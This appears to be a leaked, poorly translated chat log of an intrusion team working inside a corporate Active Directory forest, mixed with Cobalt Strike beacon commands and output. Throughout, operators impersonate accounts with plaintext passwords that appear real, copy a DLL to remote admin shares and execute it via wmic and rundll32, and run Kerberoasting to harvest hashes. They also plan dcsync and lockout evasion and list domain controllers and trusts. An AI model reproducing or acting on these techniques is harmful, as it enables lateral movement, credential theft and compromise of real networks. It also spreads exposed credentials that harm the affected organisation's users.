4: FRD frd.global (Forest tree root) (Direct Outbound) (Direct Inbound) 5: AUST standards.com.au (Direct Outbound) (Direct Inbound) 6: C360 c360.local (Direct Outbound) (Direct Inbound) 7: DATACENTER datacenter.local (Direct Outbound) (Direct Inbound) 8: SAIGPROD SaigProd.local (Direct Outbound) (Direct Inbound) 9: LEGALCO legalco.local (Direct Outbound) (Direct Inbound) 10: SAIG saig.frd.global (Forest 4) (Primary Domain) (Native) beacon> net domain [*] Tasked beacon to run net domain [+] host called home, sent: 257 bytes [+] received output: saig.frd.global beacon> shell nslookup 80-20 80-20.com [*] Tasked beacon to run: nslookup 80-20 80-20.com [+] host called home, sent: 55 bytes [+] received output: *** Request to UnKnown timed-out DNS request timed out. timeout was 2 seconds. Server: UnKnown Address: 52.58.78.16 DNS request timed out. timeout was 2 seconds. 
DNS request timed out. timeout was 2 seconds. beacon> portscan 80-20 80-20.com 445 icmp 1024 [-] portscan error: Invalid port or range '80-20.com' beacon> shell ping 80-20 80-20.com -n 1 [*] Tasked beacon to run: ping 80-20 80-20.com -n 1 [+] host called home, sent: 56 bytes [+] received output: Ping request could not find host 80-20. Please check the name and try again. beacon> shell ping LEADERS leaders.frd.global -n 1 [*] Tasked beacon to run: ping LEADERS leaders.frd.global -n 1 ``from where did you ping the process? what? if you want access from the current domain - write the login I'll look at the server from where the session came as you leave the session kill) well, from those trusts that have pinged already got hell infokonitely, or do you think that there all hell is already redone?) now you pass and you will be distributed to different servers just sorted YES from c360.local and sorted common with saig.frd.global and then the session fell off (-if the dll doesn't delete it, it's better to do it via dlld, sposk servers from AD, and where there are no / few DA processes+ who fell off can get back into the network via the peersSelect different servers and there away from the peers perform their tasks now should be+ -in a couple minutes will be anyone besides @user3 get into a different domain?who has a session fell off - that's the noise)distribute on different servers@user1 gave a session from another placeI still alive)not at the same time but still in turn normally at the same time? noise in general in terms of noise is normal that we all trusts were started with one machine? shut down the server) `` [+] received output: Pinging 10.195.115.49 with 32 bytes of data: Request timed out. Ping statistics for 10.195.115.49: Packets: Sent = 1, Received = 0, Lost = 1 (100% loss), If you're talking about all the actions, then a couple of other accounts have been blocked) all the noise and kerb and adnashumeli? 
32m respond in terms of dead@tl1 sessions fell off2 pass between identical users in two domains can be identical1 you deduct EA and YES from two domains and look for collisions here's what you're confusing me thought it was 20+ October I got confused in months of course ok) and the stoppass from 2027 changed what ok? Password last set 27/09/2020 4:07:48 AM Password expires 11/12/2020 4:07:48 AM Password changeable 28/09/2020 4:07:48 AM Password required Yes User may change password Yes ``Why? net user to check withmb_login? 1) the password to the account fits? or it changed? it seemed or why there is a pass in the domain I have not very good vision`` beacon> portscan 10.225.10.201 445 [*] Tasked beacon to scan ports 445 on 10.225.10.201. [+] host called home, sent: 93245 bytes [+] received output: (ICMP) Target '10.225.10.201' is alive. [read 8 bytes] [+] received output: 10.225.10.201:445 (platform: 500 version: 10.0 name: USHDC1-CSPADS02 domain: DATACENTER) Scanner module is complete ``Just like this, I added him to the targets on the datacenter will I get a jump like this? with the one you gave him found a man matching I downloaded from datacenter.lokal ad_userssmarid?went ping on the host Team Lead 1 @tl1 not to copy anything directly therewhat's the best way to get a session on the pdk so you don't lock the account? have you done it under a token? 
trustAttributes: 68 [Quarantined-Domain(4);Treat-External(64)] ``` I don't like his treat-external, is the domain big? ``` dn:CN=legalco.local,CN=System,DC=saig,DC=frd,DC=global >whenCreated: 2010/06/02-00:05:33 Eastern Daylight Time >name: legalco.local >securityIdentifier: S-1-5-21-1275210071-2025429265-1417001333 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: legalco.local >trustType: 2 [UpLevel(2) >trustAttributes: 68 [Quarantined-Domain(4);Treat-External(64)] ``either there will be something else there at least 6 people per comptroller so either there will be 0 and nothing found - 136 users 828 groups - 98 it does not record gradually and at all, as I remember, adfind writes to the file as soon as the stream ends and YES 500, most likely there is not enough) if the pc 5 how many users, groups, pc, and so tdu @user8 one pc, router and bucket..xD That's what I wanted to hear, thank you, God bless all the good things depending on the purpose of the domainwhere 200+where it could be 2000+ pktut not that each domain is the size of all the others) I, how should I say it ... not too early to stick it out? the guys there are 10+ meters less than a megabyte file me in the data center ad_computer to 136 comps only a question when the session will be in another domain, then you can learn LA on pdc@tl1 what command can you send a request for the withdrawal of admins to the PDK? YES, EA ok from ad_users are pulled, but LA with what can be pulled? shell copy npCIDetect.dll \10.195.23.1\C$\ProgramData shell wmic /node:10.195.23.1 process call create "rundll32 C:\ProgramData\npCIDetect.dll entryPoint" how did it get there ?@tl1 I'm walking around in the first posts @tl1 from hell what to get ? or all ?.if they are identical, then in the future you can choose any of the options try -h 1 category remove and compare results if it goes well first try through -b do not know this key) and no copying of files and loqs do you have any guides on adfind.exe ? 
how do you do it? great)@user3 where did you go? and how do you implement trust in this scheme? fill and run the adfind batnick before you fucking block the account again who the fuck else calm down man beacon> make_token saig.frd.global\Americadpm B0b@f3tt [*] Tasked beacon to create a token for saig.frd.global\Americadpm [+] host called home, sent: 53 bytes [+] Impersonated NT AUTHORITY\SYSTEM beacon> shell copy x64.dll \10.225.10.201\C$\windows\Temp\ [*] Tasked beacon to run: copy x64.dll \\\10.225.10.201\\C$\windows\Temp\ [+] host called home, sent: 76 bytes [+] received output: Access is denied. 0 file(s) copied. ``My question again I ask you how do you remove adlocate an account in another domain where there is no access already unblocked accts should already have ceased to work with trustsbut did not notice) ahahahahaht to you already in this domain)))))) and inmikpotentially allowed to copylegalco.global how come) the current domain trusts the current domain) saig.frd.global `` beacon> psinject 760 x64 Invoke-Kerberoast -outputformat hashcat | fl | out-file -filepath C:\Windows\Temp\Eula.txt -append -force -encoding UTF8 [*] Tasked beacon to psinject: Invoke-Kerberoast -outputformat hashcat | fl | out-file -filepath C:\Windows\Temp\Eula.txt -append -force -encoding UTF8 into 760 (x64) [+] host called home, sent: 133723 bytes [+] received output: Failed to create the runtime host ``what is the current domain? beacon> make_token saig.frd.global\Americadpm B0b@f3tt [*] Tasked beacon to create a token for saig.frd.global\Americadpm [+] host called home, sent: 53 bytes [+] Impersonated NT AUTHORITY\SYSTEM beacon> shell copy x64.dll \10.212.8.247\C$\ProgramData [*] Tasked beacon to run: copy x64.dll \\\10.212.8.247\C$\ProgramData [+] host called home, sent: 73 bytes [+] received output: 1 file(s) copied. 
beacon> shell wmic /node:10.212.8.247 process call create "rundll32 C:\ProgramData\x64.dll entryPoint" [*] Tasked beacon to run: wmic /node:10.212.8.247 process call create "rundll32 C:\ProgramData\x64.dll entryPoint" [+] host called home, sent: 119 bytes [+] received output: Executing (Win32_Process)->Create() Method execution successful. Out Parameters: instance of __PARAMETERS { ProcessId = 8036; ReturnValue = 0; }; ``what was the command? and what was the token? yes on the pdc from the trusts? beacon> shell copy x64.dll \datacenter.local\C$\windows\Temp\ [*] Tasked beacon to run: copy x64.dll \\\datacenter.local\C$\windows\Temp\ [+] host called home, sent: 79 bytes [+] received output: The system cannot find the file specified. 0 file(s) copied. beacon> shell copy C:\ProgramData\x64.dll \\\datacenter.local\C$\\windows\Temp\ [*] Tasked beacon to run: copy C:\ProgramData\x64.dll \\datacenter.local\C$\windows\Temp\ [+] host called home, sent: 94 bytes [+] received output: The system cannot find the file specified. 0 file(s) copied. deleted the files made a token, copied the dlc there, ran i took the token from the trusts, so all together not to sit on the same one did you take the token off? no questions followed, so it was clear to everyone the principle of trust i explained above or did you make the token? did someone copy something somewhere? 
to remove the kerbs from the trusts now also unlocked the token an important object i unlocked the token beacon> make_token saig.frd.global\sqladmin u5t3r [*] Tasked beacon to create a token for saig.frd.global\sqladmin [+] host called home, sent: 48 bytes [+] Impersonated NT AUTHORITY\SYSTEM beacon> upload /home/user/Desktop/cobalt/dll_maker/x64.dll [*] Tasked beacon to upload /home/user/Desktop/cobalt/dll_maker/x64.dll as x64.dll [+] host called home, sent: 139699 bytes beacon> shell copy x64.dll \\datacenter.local\C$\windows [*] Tasked beacon to run: copy x64.dll \\\datacenter.local\C$\windows [+] host called home, sent: 73 bytes [+] received output: The referenced account is currently locked out and may not be logged on to. 0 file(s) copied. ``made a token on it copy the dhelka to datacenter.local this is a mistake how can i lock the account here tell me what you do)) User name sqladmin Full Name SQL Admin Comment SQL Service Account User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 9/08/2007 11:31:52 AM Password expires Never Password changeable 10/08/2007 11:31:52 AM Password required Yes User may change password Yes ``` ``` The referenced account is currently locked out and may not be logged on to. 0 file(s) copied `````` Liverpool1! /user:saig.frd.global\adm.yorgar0 ``This is valid creeds yes under this token can I do? let's you discuss the issues between you first) yes everything is? so, and the AD how to shoot if the files do not copy? chs@1944! /user:saig.frd.global\adm.soucam1 I actually unhooked it with this error after the error did you exactly unhook it without the token? 
datacenter.local [10.225.10.201] - removed the kerb under the token ad-apse2.build.aws.saig - not pinged ad-usea1.prd.aws.saig - not pinged c360uk.local - not pinged ``also not taken off`` now it's hanging on this ``` beacon> psinject 440 x64 Invoke-Kerberoast Invoke-Kerberoast -OutputFormat HashCat -Domain legalco.local | fl [*] Tasked beacon to psinject: Invoke-Kerberoast Invoke-Kerberoast -OutputFormat HashCat -Domain legalco.local | fl into 440 (x64) [+] host called home, sent: 133723 bytes ``Are all the aces normal? c360.local SaigProd.local standards.com.au kerbs are not removed from them from any context currently available domains, remove hell infoSo the second removed kerbs, with the rest what? ``` ad-apse2.np.aws.saig - not pinging saig.frd.global - 10.212.8.247 ad-euce1.prd.aws.saig - not pinging usea1.np.aws.saig - dns not available, but it is not quarantined in ad_comp ```.``` user 2-2[AUHDC1-CSQCIN39]SYSTEM */2132|2020Oct05 17:34:03> shell net user CATOR-SQLSA /dom [*] Tasked beacon to run: net user CATOR-SQLSA /dom [+] host called home, sent: 56 bytes [+] received output: The request will be processed at a domain controller for domain saig.frd.global. User name CATOR-SQLSA Full Name CATOR-SQLSA Comment Assurance BAT Service Account User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 23/11/2008 3:05:24 AM Password expires Never Password changeable 24/11/2008 3:05:24 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 6/10/2020 1:15:02 AM Logon hours allowed All Local Group Memberships Global Group memberships *SG-Global-Azure-SAIGL*Domain Users The command completed successfully. ``Check all the accounts under which you did the tokens.The point is that if you do under the token, the account in the lock will fly))))) ``The user name or password is incorrect.`` What are you talking about? 
So what, he has the same credentials does not matcha so everyone supported his answer because the rest did not respond to anything means @user7 said on behalf of the team)ya molchal))) 2 1schat all lock...-so you removed them because miktoken? how the pig will understand that we will address different? datacenter.local `````` dn:CN=datacenter.local,CN=System,DC=frd,DC=global `````` dn:CN=datacenter.local,CN=System,DC=saig,DC=frd,DC=global ``Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local | how to understand`` dn:CN=datacenter.local,CN=System,DC=frd,DC=global >whenCreated: 2018/04/13-09:59:37 Eastern Daylight Time >name: datacenter.local >securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: datacenter.local >trustType: 2 [UpLevel(2) >trustAttributes: 8 [Transitive(8)] ``` ``` dn:CN=datacenter.local,CN=System,DC=saig,DC=frd,DC=global >whenCreated: 2018/06/08-09:59:39 Eastern Daylight Time >name: datacenter.local >securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: datacenter.local >trustType: 2 [UpLevel(2) >trustAttributes: 4 [Quarantined-Domain(4)] ``And you take the kerb on the trastk it is not in the quarantine how can you remove the kerb there at all?)If it is a quarantined domain.Maybe from the quarantine beacon> psinject 440 x64 Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local | fl [*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local |` fl into 440 (x64) [+] host called home, sent: 133723 bytes [+] received output: ERROR: New-Object : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were ERROR: unable to create a Kerberos credential, see inner execption for details." 
ERROR: ERROR: At line:555 char:33 ERROR: + $Ticket = New-Object <<<< System.IdentityModel.Tokens.KerberosRequestorSecurityToken ERROR: -ArgumentList $UserSPN ERROR: + CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocationException ERROR: + FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewOb ERROR: jectCommand ERROR: ERROR: GetRequest : You cannot call a method on a null-valued expression. ERROR: ERROR: At line:556 char:51 ERROR: + $TicketByteStream = $Ticket.GetRequest <<<< () ERROR: + CategoryInfo : InvalidOperation: (GetRequest:String) [], RuntimeException ERROR: + FullyQualifiedErrorId : InvokeMethodOnNull ERROR: ERROR: New-Object : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were ERROR: unable to create a Kerberos credential, see inner execption for details." ERROR: ERROR: At line:555 char:33 ERROR: + $Ticket = New-Object <<<< System.IdentityModel.Tokens.KerberosRequestorSecurityToken ERROR: -ArgumentList $UserSPN ERROR: + CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocationException ERROR: + FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewOb ERROR: jectCommand ERROR: ERROR: GetRequest : You cannot call a method on a null-valued expression. ERROR: ERROR: At line:556 char:51 ERROR: + $TicketByteStream = $Ticket.GetRequest <<<< () ERROR: + CategoryInfo : InvalidOperation: (GetRequest:String) [], RuntimeException ERROR: + FullyQualifiedErrorId : InvokeMethodOnNull ERROR: ``as already taken down in theirsnimi kerbs in this domain from system execute from YES? or to what? 
``Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local | fl'' try to execute it from your@user9 have you had these errors? from current don``t beacon> psinject 440 x64 Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local | fl [*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local | fl into 440 (x64) [+] host called home, sent: 133723 bytes [+] received output: ERROR: New-Object : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were ERROR: unable to create a Kerberos credential, see inner execption for details." ERROR: ERROR: At line:555 char:33 ERROR: + $Ticket = New-Object <<<< System.IdentityModel.Tokens.KerberosRequestorSecurityToken ERROR: -ArgumentList $UserSPN ERROR: + CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocationException ERROR: + FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewOb ERROR: jectCommand ERROR: ERROR: GetRequest : You cannot call a method on a null-valued expression. ERROR: ERROR: At line:556 char:51 ERROR: + $TicketByteStream = $Ticket.GetRequest <<<< () ERROR: + CategoryInfo : InvalidOperation: (GetRequest:String) [], RuntimeException ERROR: + FullyQualifiedErrorId : InvokeMethodOnNull ERROR: ERROR: New-Object : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were ERROR: unable to create a Kerberos credential, see inner execption for details." ERROR: ERROR: At line:555 char:33 ERROR: + $Ticket = New-Object <<<< System.IdentityModel.Tokens.KerberosRequestorSecurityToken ERROR: -ArgumentList $UserSPN ERROR: + CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocationException ERROR: + FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewOb ERROR: jectCommand ERROR: ERROR: GetRequest : You cannot call a method on a null-valued expression. 
ERROR: ERROR: At line:556 char:51 ERROR: + $TicketByteStream = $Ticket.GetRequest <<<< () ERROR: + CategoryInfo : InvalidOperation: (GetRequest:String) [], RuntimeException ERROR: + FullyQualifiedErrorId : InvokeMethodOnNull ERROR: Didn't you take it out after make_token? user 2-2[AUHDC1-CSQCIN39]SYSTEM */2132|2020Oct05 17:18:22> psinject 2132 x64 Invoke-Kerberoast -OutputFormat HashCat -Domain standards.com.au | fl [*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat -Domain standards.com.au | fl into 2132 (x64) [+] host called home, sent: 133723 bytes [+] received output: WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/asnet2000.standards.com.au:1433' from user 'CN=geronimo,OU=Users Pre-MOE,OU=SAI-Global,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details." WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/05677XPD.standards.com.au:1433' from user 'CN=Sam Allen,OU=Migrated Users - DO NOT MODIFY acounts,OU=Users,OU=SAI-Global,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details." WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/05591XPN.standards.com.au:1433' from user 'CN=Raymond Yuen,OU=Users-Disabled,OU=Users,OU=SAI-Global - objects NOT to be migrated,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details." 
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/05556WD.standards.com.au:1433' from user 'CN=Aaron Flew,OU=Migrated Users - DO NOT MODIFY acounts,OU=Users,OU=SAI-Global,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details." WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/SYDIIS.standards.com.au:1700' from user 'CN=SSQLrvService,OU=Service Accounts,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details." ``` What's wrong? Check the file? [*] Tasked beacon to psinject: invoke-kerberoast -domain datacenter.local -outputformat hashcat | fl | out-file -filepath c:\ProgramData\datacenterlocalhash.txt -append -force -encoding UTF8 into 840 (x64) [+] host called home, sent: 133723 bytes [+] received output: WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/C360SQL3:56162' from user 'CN=usatlhc-sql,CN=Users,DC=datacenter,DC=local' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details." ``a, not in hashtag format))))))) i'm going to redo it now try to remove the kerb trustabes token usernet have you taken the kerbs off and done nothing yet? if he had been blocked in front of him, most likely in 3 hours you would have lost all sessions already```` Lockout threshold: 10 ``He's not the last administrator, by the way. 
Local Group Memberships *Backup Operators *Epicor Admins Global Group memberships *Exchange Admins *SAIG Corporate IT Dat *SG-Global-FTP-Adminis*APAC Websense Web Sec *SG-EMEA-Citrix-Admin *APAC SAN Admin *SL-SAIG-EU CS vCenter*SG-AS-Citrix-AdminApp *SG-Americas-Storage-A*ucsadmin *APAC Citrix Admin Acc*SG-Global-TEN-Admin *SG-Okta-MFA Yubikey *SAIG Corporate IT SCC *SG-Global-Actifio-Adm*SG-Global-Azure-SAIGL *SG-APAC-Citrix-Admin *SG-Okta-Salesforce-Co *APAC MOM Authors *APAC Storage Admins *APAC Actifio Admins *SG-APAC-Horizon-RDP *SG-Okta-MFA SMS *SG-Okta-Admin Super A *SG-Global-FPS-Adminis* SG-Okta-Salesforce-SL *SAIG Corporate IT Tre*SAIG Corporate IT SCC *Desktop Admins *Group Policy Creator *SAIG SMS Administrato*VCO_Admins *SG-Okta-Fortinet *SG-GLOBAL-EMS-ADMIN *SG-AMER-SAN-PureAdmin*SG-Okta-MFA Okta Veri *Domain Admins *APAC vCenter Admin *SAIG SMS Users *SG-GLOBAL-vCenter Adm. *Domain Users *SG-Okta-SandboxAccess *SG-GLOBAL-Horizon-Adm*SG-AMER-HorizonPOC1-U *APAC SAN Users *SG-Americas-Citrix-Ad *Exchange Full Admins *SAIG SMS RemoteResolv *sg-aws-adfs-opsprod-c*SG-APAC-Citrix-RDP *Americas Actifio Admi*SG-Citrix-TerminalSVC *SG-Global-OKTA-Users *Firewall Admins *SG-Corp-IT-Americas *SG-Okta-Jamf Pro *SQL Admins *SPS Administrators *SG-AMER-VCENTER-Admin *SG-IT-Americas ``How many attempts do you need to see the password block policy? beacon> shell net user adm.kinzac0 /domain /active:yes [*] Tasked beacon to run: net user adm.kinzac0 /domain /active:yes [+] host called home, sent: 71 bytes [+] received output: The command completed successfully. beacon> shell net user adm.kinzac0 /dom [*] Tasked beacon to run: net user adm.kinzac0 /dom [+] host called home, sent: 56 bytes [+] received output: User name adm.kinzac0 Full Name Admin - Zach King Comment Zach King Administrator Account User's comment Country/region code (null) Account active Yes Account expires Never ``Hasn't his password been changed? 
If it was taken in the 20s ``` adm.fraste1 Password last set 23/09/2020 12:59:10 PM Password expires 7/12/2020 12:59:10 PM Password changeable 24/09/2020 12:59:10 PM ``CATOR-SQLSA Americadpm sqladmin check yes for validity did you do? not just usually sampling of 3 You have more passwords are you on dcsync? if we do not have a new password dcsync? yes user loginname /DOMAIN /active:YES ? when it hits the joint 1 day before expires and postlet to info may not be relevant literally the next day of course it's better to check accesses you have such a possibility and preferably quickly eras block his token with invalid password and blocked him) info was taken in 20 days he had his password changed on the 27th Password last set 27/09/2020 4:07:48 AM Password expires 11/12/2020 4:07:48 AM Password changeable 28/09/2020 4:07:48 AM ``So maybe the rest of the YES should also be checked? and who was blocked? what were the last 5 teams? no, so we didn't even have time to do anything (lying?:face_with_monocle: that was it(( already blocked? ``` The referenced account is currently locked out and may not be logged on to. 
`````` user 2-2[AUHDC1-CSQCIN39]SYSTEM */2132|2020Oct05 16:44:38> shell ping c360.local -n 1 [*] Tasked beacon to run: ping c360.local -n 1 [+] host called home, sent: 51 bytes [+] received output: Pinging c360.local [10.195.43.2] with 32 bytes of data: Reply from 10.195.43.2: bytes=32 time<1ms TTL=127 Ping statistics for 10.195.43.2: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms ``` ``` user 2-2[AUHDC1-CSQCIN39]SYSTEM */2132|2020Oct05 16:43:18> shell ping SaigProd.local -n 1 [*] Tasked beacon to run: ping SaigProd.local -n 1 [+] host called home, sent: 55 bytes [+] received output: Pinging SaigProd.local [10.195.100.1] with 32 bytes of data: Reply from 10.195.100.1: bytes=32 time<1ms TTL=127 Ping statistics for 10.195.100.1: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms `` please send me the current server dns and quarantines quarantined so portscan to 445 port at this address, all trusts were pinged, even 2 quarantined ones or replica on ping is disabled when you get this result, most probably from your entry point where you are in session now, traffic is not allowed. Most probably WSUS server needs to look for servers with quarantined domain in DNS so no ping, I think it is understandable here `` ``. Ping request could not find host Anstat.local. Please check the name and try again. 
``` it is like he does not see it because the domain is quarantined and DNS within this domain is not available to our domain @user3 and all others dn:CN=Anstat.local,CN=System,DC=saig,DC=frd,DC=global >whenCreated: 2007/07/02-22:18:37 Eastern Daylight Time >name: Anstat.local >securityIdentifier: S-1-5-21-295181386-3567791559-1353306441 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: Anstat.local >trustType: 2 [UpLevel(2) >trustAttributes: 4 [Quarantined-Domain(4)]``. beacon> run ping ad-apse2.prd.aws.saig [*] Tasked beacon to run: ping ad-apse2.prd.aws.saig [+] host called home, sent: 44 bytes [+] received output: Pinging ad-apse2.prd.aws.saig [10.10.149.148] with 32 bytes of data: Request timed out. Request timed out. [+] received output: Request timed out. Request timed out. Ping statistics for 10.10.149.148: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), ``3/4 100% loss''. Pinging ad-apse2.np.aws.saig [10.10.4.166] with 32 bytes of data: Request timed out. Ping statistics for 10.10.4.166: Packets: Sent = 1, Received = 0, Lost = 1 (100% loss), `````` beacon> run ping Anstat.local [*] Tasked beacon to run: ping Anstat.local [+] host called home, sent: 35 bytes [+] received output: Ping request could not find host Anstat.local. Please check the name and try again. If it's not pinging, do you go further down the list? And another thing, since the report will be an archive, next to the ad_*.txt file, make a creds.txt file. 
DCs DA EA LA and if you run the command 5 times net use in another domain without reading the error as you like, then you can say that about 50% of the admins that something will suspect) and more, crud YES in other domains can block your account as you understand the beginning ping all domains and see if they respond quarantined more difficult because you can not get out of there any information, you can check the availability of DNS from a quarantined domain but in this case, dsync THROUGH trust will be very noisyIn such a relationship, you can use trust to pull kerbs, pull AD, I think @user8 dcsync by trust just saw @user7 take two quarantined domains)))) it's harder with quarantined domains dn:CN=80-20.com,CN=System,DC=saig,DC=frd,DC=global >whenCreated: 2008/04/03-00:34:59 Eastern Daylight Time >name: 80-20.com >securityIdentifier: S-1-5-21-789336058-1343024091-1417001333 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: 80-20.com >trustType: 2 [UpLevel(2) >trustAttributes: 4 [Quarantined-Domain(4)] `````` dn:CN=datacenter.local,CN=System,DC=frd,DC=global >whenCreated: 2018/04/13-09:59:37 Eastern Daylight Time >name: datacenter.local >securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: datacenter.local >trustType: 2 [UpLevel(2) >trustAttributes: 8 [Transitive(8)] ````trustDirection ``trustAttributes`` Did you read what to look for? trusts can't have all pdk's, right? ``` trusts: datacenter.local ad-apse2.build.aws.saig ad-usea1.prd.aws.saig c360uk.local ``` ``` EA: saig.frd.global\CATOR-SQLSA T3rm1nal ``anyone read the trusts file? 
dn:CN=standards.com.au,CN=System,DC=saig,DC=frd,DC=global dn:CN=SaigProd.local,CN=System,DC=saig,DC=frd,DC=global dn:CN=c360.local,CN=System,DC=saig,DC=frd,DC=global ``` my `saig.frd.global\tresvc0 3nterprisE```` saig.frd.global\adm.kinzac0 dr3Amth3At3r ``` ``` dn:CN=ad-apse2.np.aws.saig,CN=System,DC=frd,DC=global dn:CN=saig.frd.global,CN=System,DC=frd,DC=global dn:CN=ad-euce1.prd.aws.saig,CN=System,DC=frd,DC=global dn:CN=ad-usea1.np.aws.saig,CN=System,DC=frd,DC=global `````` saig.frd.global\tresvc0 3nterprisE >name: datacenter.local >name: legalco.local >name: anstat.local >name: ad-apse2.prd.aws.saig ``So if we find these, they are written in a separate groupwhy I wrote about the allocation of backup servers, you should relate to the scan, it often happens that the backup server is outside the domain, they are somewhere in the workgroup nearby and as you have understood, the report will be the archive in which 1) YES, hell info, EA, LA on MAC, hashes of all users 2) Sort all PCs in the domain 3) Which EDR and where it is administered (admin with valid accesses) 4) In each trust session (or specifying the links from where to where and how to get in) 6) Separate group of backup servers, separate user's PCs Repeat items above for each domain to 3 hours can handle it (260 machines per brotam will be reported to me if we do it manually) 1300 servers in one domain this time I think immediately by hand, on Saturday almost an hour with the script struggled, in the end pinged for 5 minutes, what did loomisco disassemble the network What is the task? again pinged decided yes? 
hopefully this time faster) ad_comp > win serv > ping > portscan /24 ?``` IDJAK-COPFP01.saig.frd.global [DS] Site: IDKBU1 UKMK1-COPADS01.saig.frd.global [DS] Site: UKMIK1 USALP1-COPADS01.saig.frd.global [DS] Site: USALP1 USWAL1-COPADS01.saig.frd.global [DS] Site: USWAT1 CNPEKJV-DC1.saig.frd.global [DS] Site: CNCHD1 AUMEL1-COPADS02.saig.frd.global [DS] Site: AUMEL1 THPAT1-COPADS02.saig.frd.global [DS] Site: THPAT1 AUBNE1-COPADS01.saig.frd.global [DS] Site: AUBNE1 AUOSB1-COPADS01.saig.frd.global [DS] Site: AUOSB1 AUPME1-COPADS02.saig.frd.global [DS] Site: AUPME1 JPTOK1-COPADS01.saig.frd.global [DS] Site: JPTOK1 UKHDC1-COPADS01.saig.frd.global [DS] Site: UKHDC1 UKHDC1-COPADS02.saig.frd.global [DS] Site: UKHDC1 CATOR1-COPADS01.saig.frd.global [DS] Site: CATOR1 auhdc1-copads01.saig.frd.global [PDC] [DS] Site: AUHDC1 AUSYD1-COPADS01.saig.frd.global [DS] Site: AUSYD1 USHDC1-COPADS03.saig.frd.global [DS] Site: USHDC1 USHDC1-COPADS02.saig.frd.global [DS] Site: USHDC1 AUHDC2-COPADS02.saig.frd.global [DS] Site: AUHDC2 AUHDC2-COPADS01.saig.frd.global [DS] Site: AUHDC2 AUHDC1-COPADS03.saig.frd.global [DS] Site: AUHDC1 AUSYD1-COPADS02.saig.frd.global [DS] Site: AUSYD1 AUHDC1-COPADS02.saig.frd.global [DS] Site: AUHDC1 AUHDC1-COPADS04.saig.frd.global [DS] Site: AUHDC1 NLDEN1-COPADS01.saig.frd.global [DS] Site: NLDEN1 AUHDC1-COPADS05.saig.frd.global [DS] Site: AUHDC1 AUADE1-COPADS03.saig.frd.global [DS] Site: AUADE1 KRSEO1-COPADS01.saig.frd.global [DS] Site: KRSEO1 IDJAK-COPADS01.saig.frd.global [DS] Site: IDKBU1 auspt1-copads02.saig.frd.global [DS] Site: AUSPT1 EUCEN1COPADS01.saig.frd.global [DS] Site: EUCEN1 EUCEN1COPADS02.saig.frd.global [DS] Site: EUCEN1 EUCEN1COPADS03.saig.frd.global [DS] Site: EUCEN1 usnachc-rbs01.saig.frd.global [RODC] ittur1-cop-rbs1.saig.frd.global [RODC] esmad1-cop-rbs1.saig.frd.global [RODC] aubne1-rbs01.saig.frd.global [RODC] auhdc2-rbs01.saig.frd.global [RODC] thpat1-rbs01.saig.frd.global [RODC] idjak1-rbs01.saig.frd.global [RODC] 
